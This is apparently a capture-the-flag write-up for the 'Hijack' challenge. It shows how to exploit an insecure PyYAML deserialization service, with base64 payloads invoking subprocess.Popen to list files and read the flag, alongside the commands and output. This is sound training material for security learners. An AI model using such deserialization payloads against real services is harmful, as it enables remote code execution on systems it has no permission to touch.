<- HTB CYBER APOCALYPSE

Hijack

3 minutes to read

We are given a remote instance to connect to:

$ nc 167.71.143.44 31614  

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
>

Basic reconnaissance

We have two options. Using the first one, we can set some configuration and the output is a Base64-encoded string:

$ nc 165.232.100.46 31251

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 1

- Creating new config -
Temperature units (F/C/K): C
Propulsion Components Target Temperature : 13
Solar Array Target Temperature : 37
Infrared Spectrometers Target Temperature : 0
Auto Calibration (ON/OFF) : ON

Serialized config: ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo=  
Uploading to ship...

If we decode this string, we will see that it is a serialized object:

$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d
!!python/object:__main__.Config {IR_spectrometer_temp: '0', auto_calibration: 'ON',
  propulsion_temp: '13', solar_array_temp: '37', units: C}

$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d | xxd  
00000000: 2121 7079 7468 6f6e 2f6f 626a 6563 743a  !!python/object:
00000010: 5f5f 6d61 696e 5f5f 2e43 6f6e 6669 6720  __main__.Config
00000020: 7b49 525f 7370 6563 7472 6f6d 6574 6572  {IR_spectrometer
00000030: 5f74 656d 703a 2027 3027 2c20 6175 746f  _temp: '0', auto
00000040: 5f63 616c 6962 7261 7469 6f6e 3a20 274f  _calibration: 'O
00000050: 4e27 2c0a 2020 7072 6f70 756c 7369 6f6e  N',.  propulsion
00000060: 5f74 656d 703a 2027 3133 272c 2073 6f6c  _temp: '13', sol
00000070: 6172 5f61 7272 6179 5f74 656d 703a 2027  ar_array_temp: '
00000080: 3337 272c 2075 6e69 7473 3a20 437d 0a    37', units: C}.

Moreover, if we search a bit we will identify the type of serialization is YAML.

Deserialization attack

PyYAML is known to be insecure if it deserializes untrusted data, which might be option 2.

There is a public project called python-deserialization-attack-payload-generator that allows us to generate payloads to exploit insecure deserialization vulnerabilities in Python (more information in HackTricks):

$ cd python-deserialization-attack-payload-generator

$ python3 peas.py
Enter RCE command :ls -la
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :./payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!

$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=

Let’s try it:

$ nc 165.232.100.46 31251

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2

Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=  
** Success **
Uploading to ship...

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> total 20
drwxr-sr-x    1 ctf      ctf           4096 Mar 10 20:10 .
drwxr-xr-x    1 root     root          4096 Mar 10 20:10 ..
-rw-rw-r--    1 root     root          1583 Mar 10 20:08 chall.py
-rw-rw-r--    1 root     root            49 Mar 10 20:08 flag.txt
-rwxrwxr-x    1 root     root          1583 Mar 10 20:08 hijack.py

Nice!

Flag

Let’s now read the flag:

$ python3 peas.py
Enter RCE command :cat flag.txt
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!

$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=

$ nc 165.232.100.46 31251

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2

Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=  
** Success **
Uploading to ship...

<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}